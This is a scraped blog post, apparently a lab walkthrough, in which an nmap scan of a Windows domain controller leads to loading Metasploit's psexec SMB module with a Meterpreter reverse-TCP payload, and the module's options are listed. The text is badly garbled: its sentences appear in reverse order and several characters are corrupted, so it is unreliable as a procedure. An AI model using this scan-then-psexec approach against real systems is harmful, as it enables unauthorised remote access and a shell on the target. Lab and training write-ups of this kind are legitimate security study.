![]() ![]() LHOST x.x.x.x yes The listen address (an interface may be specified) Payload options (windows/meterpreter/reverse_tcp):ĮXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process SMBUser no The username to authenticate as SMBSHARE no The share to connect to, can be an adm Meterpreter explit suggester password#SMBPass no The password for the specified usernam ![]() Meterpreter explit suggester windows#no The Windows domain to use for authenti SERVICE_DISPLAY_NAME no The service display name SERVICE_DESCRIPTION no Service description to to be used on t Name Current Setting Required Description Module options (exploit/windows/smb/psexec): Now we should look at our options: sf6 exploit(windows/smb/psexec) > show options No payload configured, defaulting to windows/meterpreter/reverse_tcp Let’s try loading Metasploit msfconsole and leveraging the the exploit/windows/smb/psexec module: msf6 > use exploit/windows/smb/psexec Ports 135, 139and 445 look very promising □ Exploitation Nmap done: 1 IP address (1 host up) scanned in 26.25 seconds Read data files from: /usr/bin/./share/nmap ![]() Service Info: Host: ACME-TEST OS: Windows CPE: cpe:/o:microsoft:windows Host is up, received echo-reply ttl 125 (0.17s latency).ĥ3/tcp open domain syn-ack ttl 125 Simple DNS PlusĨ0/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0Ĩ8/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 13:55:09Z)ġ35/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPCġ39/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssnģ89/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: FLASH.local0., Site: Default-First-Site-Name)Ĥ45/tcp open microsoft-ds? syn-ack ttl 125ĥ93/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0ģ268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: FLASH.local0., Site: Default-First-Site-Name)ģ389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services Stats: 0:00:03 elapsed 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan at 06:54Ĭompleted Parallel DNS resolution of 1 host. Initiating Parallel DNS resolution of 1 host. Let’s do a quick nmap scan: sudo nmap -sV -vv 10.10.131.12 130 ⨯Ĭompleted Ping Scan at 06:54, 0.20s elapsed (1 total hosts) ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |